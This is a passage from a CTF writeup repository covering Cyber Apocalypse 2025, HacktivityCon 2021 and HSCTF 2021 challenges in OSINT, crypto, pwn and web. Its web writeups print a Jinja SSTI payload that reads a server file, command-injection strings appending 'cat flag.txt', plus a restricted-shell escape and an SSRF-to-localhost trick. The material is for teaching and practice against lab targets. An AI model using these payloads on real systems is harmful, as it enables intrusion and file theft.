43 | random_sum, flag_choices = magic()
44 |
45 | print(flag_choices)
46 | ```
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Cyber Apocalypse 2025
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | ---
8 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/EchoesInStone.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Echoes In Stone Writeup
4 | desc: Check out our writeup for Echoes In Stone for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: Echoes In Stone
10 | tags: "osint, xan0er, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by Xan0er
18 |
19 |
20 | 
21 |
22 |
23 |
24 | - After a simple google reverse image search, we get the name of the place where this cross is located: `Muiredach's High Cross`
25 | - Coordinates: `53.7776973,-6.4178868`
26 |
27 | ```
28 | HTB{Muriedach_High_Cross}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheAncientCitadel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Ancient Citadel Writeup
4 | desc: Check out our writeup for The Ancient Citadel for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Ancient Citadel
10 | tags: "osint, twh, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | 
21 |
22 | - Reverse image search reveals the name of the place : `castillo brunet`
23 | - Located at : `Iberia 104, 2571409 Viña del Mar, Valparaíso, Chile`
24 |
25 | ```
26 | HTB{Iberia_104_2571409_Viña_del_Mar_Valparaíso}
27 | ```
28 |
29 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheMechanicalBirdsNest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Mechanical Bird's Nest Writeup
4 | desc: Check out our writeup for The Mechanical Bird's Nest for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Mechanical Bird's Nest
10 | tags: "osint, twh, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by thewhiteh4t
17 |
18 |
19 | 
20 |
21 | - For those who are into UAPs and aliens they know what this place is : Area51
22 | - Otherwise a reverse image search is enough
23 |
24 | https://maps.app.goo.gl/fKMxT9BCjm3qTuNB7
25 |
26 | HTB{37.247_-115.812}
27 |
28 |
29 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheShadowedSigil.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Shadowed Sigil Writeup
4 | desc: Check out our writeup for The Shadowed Sigil for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Shadowed Sigil
10 | tags: "osint, twh, search"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | - An IP address is given, which is an IoC of APT28 : `139.5.177.205`
21 |
22 | https://ioc.one/auth/attribute/edaac7f0-e137-5bdf-a2d3-5377b688275e
23 |
24 |
25 | HTB{APT28}
26 |
27 |
28 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/osint/TheStoneThatWhispers.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | The Stone That Whispers Writeup
4 | desc: Check out our writeup for The Stone That Whispers for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: osint
9 | challenge: The Stone That Whispers
10 | tags: "osint, xan0er, reverse, image"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by Xan0er
18 |
19 |
20 | 
21 |
22 | - Just like the `Echoes In Stone` challenge, we reversed image search the given image in the challenge, and we will get the name of place where this stone is located: `Hill Of Tara`
23 | - After reading through Wikipedia article, we get the name of the stone: `Lia Fail`
24 | - Coordinates: `53.5817331,-6.6101392`
25 |
26 | ```
27 | HTB{Lia_Fail}
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web.md:
--------------------------------------------------------------------------------
1 | # web
2 |
3 | ## Trial by Fire
4 | > Solved by thewhiteh4t
5 |
6 |
7 | - We have an input and a hint for SSTI `Can you read the runes? Perhaps 49 is the key.`
8 | - On the battle result page we can see that SSTI is working
9 |
10 |
11 | 
12 |
13 | - Payload :
14 |
15 | ```
16 | {{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}
17 | ```
18 |
19 | - Length of the input is restricted in the front-end, so we can either edit the length in inspect or simply use burp
20 |
21 |
22 | 
23 |
24 | ----------
25 |
26 |
27 | ## Whispers of the Moonbeam
28 | > Solved by thewhiteh4t
29 |
30 |
31 | - Hint of command injection is already given very clearly in the page
32 | - Payload :
33 |
34 | ```
35 | gossip; cat flag.txt
36 | ```
37 |
38 | 
39 |
40 |
41 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web/TrialbyFire.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Trial by Fire Writeup
4 | desc: Check out our writeup for Trial by Fire for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: web
9 | challenge: Trial by Fire
10 | tags: "web, twh, ssti"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by thewhiteh4t
17 |
18 |
19 | - We have an input and a hint for SSTI `Can you read the runes? Perhaps 49 is the key.`
20 | - On the battle result page we can see that SSTI is working
21 |
22 |
23 | 
24 |
25 | - Payload :
26 |
27 | ```
28 | {% raw %}
29 | {{ request.__class__._load_form_data.__globals__.__builtins__.open("/app/flag.txt").read() }}
30 | {% endraw %}
31 | ```
32 |
33 | - Length of the input is restricted in the front-end, so we can either edit the length in inspect or simply use burp
34 |
35 |
36 | 
37 |
38 |
--------------------------------------------------------------------------------
/cyber_apocalypse_2025/web/WhispersoftheMoonbeam.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Cyber Apocalypse 2025 | Whispers of the Moonbeam Writeup
4 | desc: Check out our writeup for Whispers of the Moonbeam for Cyber Apocalypse 2025 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Cyber Apocalypse 2025
7 | parent: cyber_apocalypse_2025
8 | category: web
9 | challenge: Whispers of the Moonbeam
10 | tags: "web, twh, command, injection"
11 | date: 2025-03-29T00:00:00+00:00
12 | last_modified_at: 2025-03-29T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by thewhiteh4t
18 |
19 |
20 | - Hint of command injection is already given very clearly in the page
21 | - Payload :
22 |
23 | ```
24 | gossip; cat flag.txt
25 | ```
26 |
27 | 
28 |
29 |
30 |
--------------------------------------------------------------------------------
/gpnctf_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | GPN CTF 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Gpnctf 2024
7 | ---
--------------------------------------------------------------------------------
/hacktivitycon_2021/README.md:
--------------------------------------------------------------------------------
1 | # HacktivityCon CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Crypto](crypto.md)
8 | * [Misc](misc.md)
9 | * [Mobile](mobile.md)
10 | * [OSINT](osint.md)
11 | * [Pwn](pwn.md)
12 | * [Scripting](scripting.md)
13 | * [Warmups](warmups.md)
14 | * [Web](web.md)
--------------------------------------------------------------------------------
/hacktivitycon_2021/crypto/Hexahedron.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Hexahedron Writeup
4 | desc: Check out our writeup for Hexahedron for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: crypto
9 | challenge: Hexahedron
10 | tags: "crypto, taz, rsa, rsactftool"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - We are give values of n,e and c.
20 | - Decode them into simple numeric form using python.
21 | 
22 |
23 | - it looks like RSA, we used RsaCtfTool to decipher it.
24 |
25 | : https://github.com/Ganapati/RsaCtfTool
26 |
27 |
28 | python3 RsaCtfTool.py -n 112339816301925396926211289689793745814213925314273886071305785874178028552510482239036537066616690493241410015435402110525284201411608164205573122430898583517515498250410244592963132324072861567753086739636553410154316180827724708002409356129254383468446158145079982391991062389788544378839486986385137994309 -e 3 --uncipher 2217344750798178599616518881851238192046537371134831984828894413752520937378161486880269974456574131502921272953104454680926482208357166098075344508240480152890914678813031666242202555794691235412837030045499161787224264164243336308650477343133919653356349913604131486721125
29 |
30 |
31 | 
32 |
33 |
34 | here we have the flag.
--------------------------------------------------------------------------------
/hacktivitycon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | HacktivityCon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | ---
--------------------------------------------------------------------------------
/hacktivitycon_2021/misc/BadWords.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Bad Words Writeup
4 | desc: Check out our writeup for Bad Words for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: misc
9 | challenge: Bad Words
10 | tags: "misc, bobby, bash, jail, escape"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : bobbysox
19 |
20 | This challenge was interesting. 99% of characters that I entered were flagged as “Bad Words”
21 | After some trial and error, i got the first message down below “bash: fg: no job control”
22 |
23 | I tried to implement some job control with no luck. However, when trying this, I noticed it processed “#! /bin/bash” without throwing errors. It processes the “/” character!!!! This made me take a step back and think about what were in. We’re in a custom restricted shell. In the past ive usually used native binaries to escape such situations. We have two options here: prefix our commands with “/”, or, try and call native binaries since we know we can just call any path. The latter seemed like the best solution. Call /bin/bash and see what happens. It worked!!! yay!
24 |
25 |
26 | 
27 |
28 |
29 |
30 | 
31 |
32 |
33 |
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile.md:
--------------------------------------------------------------------------------
1 | # mobile
2 |
3 | ## To do
4 | > Solved by: Starry-lord
5 |
6 | De-compile the app
7 |
8 | I personally used
9 | https://www.decompiler.com/jar/62e31f7faaf148b1b1c4fd143e5480c1/todo.apk/sources/com/congon4tor/todo/LoginActivity.java
10 |
11 |
12 | 
13 |
14 |
15 | Find password "testtest"
16 |
17 | Login to the app and find to do list along with the flag
18 |
19 |
20 | 
21 |
22 | ----------
23 |
24 | ## Reactor
25 | > Solved by: Starry-Lord
26 |
27 |
28 | Flag gets more and more unscrambled with correct digits.
29 | Basically 4 digit Pin probabilities plus dynamic deobfuscating made the total of possibilities go down to less than 40, like an Eval situation, where you would have result if your first characters are correct.
30 |
31 | A. Input 1 digit, 0 to 5, (5)
32 | B. Input second digit 0-9(9)
33 | C. Input third digit 0-2(2)
34 | D. Input fourth digit 0-7(flag!)
35 |
36 | 27 tries on /40
37 |
38 | I agree it's most likely not the intended way but 4 digits pin plus Eval like function is vulnerable enough 😉
39 |
40 | 
41 |
42 |
43 | 5 was the only one starting with letter f, four characters and a promising { like in other flags.
44 |
45 | 
46 |
47 | 
48 |
49 | 
50 |
51 | 
52 |
53 |
54 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile/Reactor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Reactor Writeup
4 | desc: Check out our writeup for Reactor for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: mobile
9 | challenge: Reactor
10 | tags: "mobile, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 |
19 | Flag gets more and more unscrambled with correct digits.
20 | Basically 4 digit Pin probabilities plus dynamic deobfuscating made the total of possibilities go down to less than 40, like an Eval situation, where you would have result if your first characters are correct.
21 |
22 | A. Input 1 digit, 0 to 5, (5)
23 | B. Input second digit 0-9(9)
24 | C. Input third digit 0-2(2)
25 | D. Input fourth digit 0-7(flag!)
26 |
27 | 27 tries on /40
28 |
29 | I agree it's most likely not the intended way but 4 digits pin plus Eval like function is vulnerable enough 😉
30 |
31 | 
32 |
33 |
34 | 5 was the only one starting with letter f, four characters and a promising { like in other flags.
35 |
36 | 
37 |
38 | 
39 |
40 | 
41 |
42 | 
43 |
44 |
45 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/mobile/Todo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | To do Writeup
4 | desc: Check out our writeup for To do for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: mobile
9 | challenge: To do
10 | tags: "mobile, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-lord
17 |
18 | De-compile the app
19 |
20 | I personally used
21 | https://www.decompiler.com/jar/62e31f7faaf148b1b1c4fd143e5480c1/todo.apk/sources/com/congon4tor/todo/LoginActivity.java
22 |
23 |
24 | 
25 |
26 |
27 | Find password "testtest"
28 |
29 | Login to the app and find to do list along with the flag
30 |
31 |
32 | 
--------------------------------------------------------------------------------
/hacktivitycon_2021/osint.md:
--------------------------------------------------------------------------------
1 | # osint
2 |
3 | ## Challenge Jed Sheeran
4 | > Solved by: Starry-lord
5 |
6 | Google jed sheeran music and find a soundcloud account
7 |
8 |
9 | https://m.soundcloud.com/user-836083929-176777888/beautiful-people
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/osint/ChallengeJedSheeran.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Challenge Jed Sheeran Writeup
4 | desc: Check out our writeup for Challenge Jed Sheeran for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: osint
9 | challenge: Challenge Jed Sheeran
10 | tags: "osint, starry"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-lord
17 |
18 | Google jed sheeran music and find a soundcloud account
19 |
20 |
21 | https://m.soundcloud.com/user-836083929-176777888/beautiful-people
22 |
23 | 
24 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Butter Overflow
4 | > Solved by: Taz34
5 |
6 |
7 | - As the name suggested it’s a buffer overflow challenge
8 | - So I started by giving huge inputs
9 | - And further narrowed it down and found the offset
10 | - The offset is 520 so we need 521 characters to do a buffer overflow to read the flag
11 | 
12 |
13 |
14 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/pwn/ButterOverflow.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Butter Overflow Writeup
4 | desc: Check out our writeup for Butter Overflow for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: pwn
9 | challenge: Butter Overflow
10 | tags: "pwn, taz, bof"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - As the name suggested it’s a buffer overflow challenge
20 | - So I started by giving huge inputs
21 | - And further narrowed it down and found the offset
22 | - The offset is 520 so we need 521 characters to do a buffer overflow to read the flag
23 | 
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/2EZ.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | 2EZ Writeup
4 | desc: Check out our writeup for 2EZ for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: 2EZ
10 | tags: "warmup, twh, magic bytes"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a file named `2ez`
22 | - the file format is not known when I tested it with `file` command
23 |
24 |
25 | 
26 |
27 | - next I tried `binwalk` to look for any hidden files but the output was blank
28 | - next I checked the MAGIC of the file i.e. the header
29 | - file magic is responsible for the correct file format
30 | - file command checks magic and file footer to determine correct file type
31 |
32 |
33 | 
34 |
35 |
36 |
37 | - JFIF header means a jpeg file
38 | - correct header for JFIF in hex is : `FF D8 FF`
39 | - but if we look at the file given to us its different, so I fixed it using a hex editor
40 |
41 |
42 | 
43 |
44 | - Saved it as a new file and solved
45 |
46 |
47 | 
48 |
49 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/Bass64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Bass64 Writeup
4 | desc: Check out our writeup for Bass64 for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Bass64
10 | tags: "warmup, twh"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a text file in this challenge
22 | - file contains letters and numbers in ASCII art
23 | - it’s actually a base64 string
24 | - converting it gives the flag
25 |
26 |
27 | 
28 |
29 |
30 |
31 | flag{35a5d13da6a2afa0c62bfcbdd6301a0a}
32 |
33 |
34 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/Pimple.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Pimple Writeup
4 | desc: Check out our writeup for Pimple for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Pimple
10 | tags: "warmup, twh, gimp"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved By : thewhiteh4t
19 |
20 |
21 | - We are given a gimp project file in this challenge
22 | - there are multiple layers
23 | - each layer contains an image
24 | - to see the flag I started hiding the layers one by one from top and eventually saw the flag
25 |
26 |
27 | 
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/SixFourOverTwo.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Six Four Over Two Writeup
4 | desc: Check out our writeup for Six Four Over Two for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Six Four Over Two
10 | tags: "warmup, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved by: Taz34
19 |
20 | we have a cipher text give, run it through cyber chef and decode it to get the flag.
21 |
22 | 
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/TSUNAMI.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | TSUNAMI Writeup
4 | desc: Check out our writeup for TSUNAMI for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: TSUNAMI
10 | tags: "warmup, taz, stegano, sonic, spectogram"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 |
18 | > Solved by: Taz34
19 |
20 |
21 | - We are given a .wav audio file
22 | - at the end of the audio we can here sum disturbances
23 | - so i checked the audio file with sonic visualizer
24 | - checked with spectrograms
25 | 
26 |
27 |
28 | here is the flag.
29 |
30 |
31 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/warmups/TargetPractice.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Target Practice Writeup
4 | desc: Check out our writeup for Target Practice for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: warmups
9 | challenge: Target Practice
10 | tags: "warmup, ava, stegano"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : ava
17 |
18 | We are given a GIF file, which actually works, and after opening we can see it has some sort of code on it, which changes pretty quick, so we need to split GIF into frames, I used https://ezgif.com/split to split and then downloaded all frames, and did a quick google re-image search on one of them, which result us in knowing that it is called MAXICODE, used by UPS.
19 | then I found i MAXICODE decoder - https://products.aspose.app/barcode/recognize/maxicode#
20 | and i had to manually check every image, which seems like not the intended way, but okie.
21 | The 15th frame (if you started counting from 0) has the flag
22 |
23 | `flag{385e3ae5d7b2ca2510be8ef4}`
24 |
25 |
26 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/Confidentiality.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Confidentiality Writeup
4 | desc: Check out our writeup for Confidentiality for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: Confidentiality
10 | tags: "web, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Taz34
18 |
19 |
20 | - here we have a service which lists all the items in the mentioned dir
21 | - so i simply started looking for flag, look for elements in the /home dir
22 | - here we have a user dir and in that we have the flag.txt
23 | 
24 |
25 |
26 | now to red the file
27 |
28 | /home/user & cat /home/user/flag.txt
29 | 
30 |
31 |
32 | here we have the flag
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/SWAGGY.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | SWAGGY Writeup
4 | desc: Check out our writeup for SWAGGY for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: SWAGGY
10 | tags: "web, taz"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 |
19 | - Change the server to the testing server
20 | 
21 |
22 | - now authorize using the admin:admin credentials
23 | 
24 |
25 | - now try and execute the request to get the flag
26 | 
27 |
28 |
29 | here we have the flag.
30 |
--------------------------------------------------------------------------------
/hacktivitycon_2021/web/Titanic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hacktivitycon 2021 | Titanic Writeup
4 | desc: Check out our writeup for Titanic for Hacktivitycon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hacktivitycon 2021
7 | parent: hacktivitycon_2021
8 | category: web
9 | challenge: Titanic
10 | tags: "web, twh"
11 | date: 2021-09-20T00:00:00+00:00
12 | last_modified_at: 2021-09-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 |
19 | - In this challenge we were given a website of a company
20 | - Two things which instantly caught attention were `URL Capture` and `Admin` buttons
21 | - URL capture service accepts a URL and takes screenshot of the webpage
22 |
23 |
24 | 
25 |
26 |
27 |
28 | - Admin page got a login
29 | - First idea was to try `http://localhost` and it worked
30 |
31 |
32 | 
33 |
34 | 
35 |
36 | - This is same as the loading splash screen I saw while loading the challenge website
37 | - Next I checked `robots.txt` and got 200 and this revealed a new path `/server-status`
38 |
39 |
40 | 
41 |
42 |
43 |
44 | - Next I obviously tried to access `/server-status` and got 200 again
45 |
46 |
47 | 
48 |
49 | - And in the logs you can see the login credentials!
50 |
51 |
52 | 
53 |
54 |
--------------------------------------------------------------------------------
/hsctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # HSCTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Misc](misc.md)
8 | * [Web](web.md)
9 | * [Algo](algo.md)
10 | * [Pwn](pwn.md)
11 | * [Crypto](crypto.md)
--------------------------------------------------------------------------------
/hsctf_2021/crypto/queenofthehill.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | queen-of-the-hill Writeup
4 | desc: Check out our writeup for queen-of-the-hill for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: crypto
9 | challenge: queen-of-the-hill
10 | tags: "crypto, starry, cipher"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | A bit of research took me to hill cipher.
21 |
22 | 
23 |
24 | ```
25 | flag{climb_your_way_to_the_top}
26 | ```
--------------------------------------------------------------------------------
/hsctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | HSCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | ---
--------------------------------------------------------------------------------
/hsctf_2021/misc/Geographic1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | Geographic 1 Writeup
4 | desc: Check out our writeup for Geographic 1 for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: Geographic 1
10 | tags: "misc, ava, starry, osint"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Ava and Starry-Lord
17 |
18 | **Image 1**
19 |
